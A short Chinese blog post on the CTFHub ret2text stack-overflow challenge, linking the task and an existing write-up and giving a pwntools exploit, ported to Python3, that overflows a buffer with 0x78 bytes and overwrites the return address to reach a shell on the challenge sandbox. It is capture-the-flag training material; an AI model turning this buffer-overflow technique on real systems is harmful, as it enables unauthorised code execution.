题目链接:https://www.ctfhub.com -> 技能树 -> PWN -> 栈溢出 -> ret2text
WP:https://writeup.ctfhub.com/Skill/Pwn/%E6%A0%88%E6%BA%A2%E5%87%BA/eeca3548.html
搜exp的时候发现已经有人写过WP了,于是就Cirl+CV,发现原程序是用Python2写的,我的pwntools环境是Python3,因此程序需要稍作修改。
from pwn import *
host = 'challenge-23b7868abfc49eea.sandbox.ctfhub.com'
port = 31443
#p = process("./pwn")
p = connect(host, port)
payload = bytes('A',encoding="utf8") * 0x78 + p64(0x4007b8)#类型不同不能拼接
p.sendline(payload)
p.interactive()
END
博客给出CTF栈溢出题目链接及WP链接,作者搜exp时发现已有WP,但原程序用Python2编写,而自己的pwntools环境是Python3,需对程序稍作修改。
2395

被折叠的 条评论
为什么被折叠?



